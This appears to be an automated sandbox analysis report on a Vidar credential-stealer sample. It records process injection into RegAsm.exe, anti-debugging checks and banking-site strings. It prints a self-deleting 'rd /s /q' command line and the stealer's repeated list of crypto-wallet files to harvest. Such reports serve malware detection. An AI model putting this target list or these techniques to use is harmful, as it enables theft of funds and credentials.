              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.9 %
              Source: C:\Windows\SysWOW64\timeout.exe TID: 5412Thread sleep count: 81 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h2_2_0040FCE5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144493 FindFirstFileExW,0_2_00144493
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004162AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004153F6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B463
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_004094E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C679
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415AC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409F72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A981
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415E66
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415843
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FE81 GetSystemInfo,wsprintfA,2_2_0040FE81
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: AKJDGI.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: AKJDGI.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: AKJDGI.2.drBinary or memory string: discord.comVMware20,11696487552f
              Source: AKJDGI.2.drBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: AKJDGI.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: AKJDGI.2.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: global block list test formVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: RegAsm.exe, 00000002.00000002.2468417703.0000000003415000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarekW/
              Source: AKJDGI.2.drBinary or memory string: AMC password management pageVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: AKJDGI.2.drBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: AKJDGI.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: AKJDGI.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: AKJDGI.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: AKJDGI.2.drBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: AKJDGI.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: RegAsm.exe, 00000002.00000002.2468417703.0000000003415000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: AKJDGI.2.drBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: AKJDGI.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: AKJDGI.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: AKJDGI.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-78746
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00138F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00138F06
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013C35D mov ecx, dword ptr fs:[00000030h]0_2_0013C35D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014560E mov eax, dword ptr fs:[00000030h]0_2_0014560E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00147C0D GetProcessHeap,0_2_00147C0D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00135102 SetUnhandledExceptionFilter,0_2_00135102
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00135237 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00135237
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00138F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00138F06
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134FA6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00134FA6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041937F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E438 SetUnhandledExceptionFilter,2_2_0041E438
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A8A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC6B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6CC6B66C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC6B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CC6B1F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CE1AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CE1AC62

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7144, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
              Contains functionality to inject code into remote processes
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00C4018D
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Searches for specific processes (likely to inject)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111BE
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BF8008Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134CCC cpuid 0_2_00134CCC
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_0013F01F
              Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00147047
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_001478DC
              Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_001479AB
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_001472E9
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00147334
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_001473CF
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0014745A
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_0013F545
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_001476AD
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001477D6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_0040FCE5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134EA0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00134EA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,2_2_0040FBCB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_0040FC92
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Vidar
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Yara detected Vidar stealer
              Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7144, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local 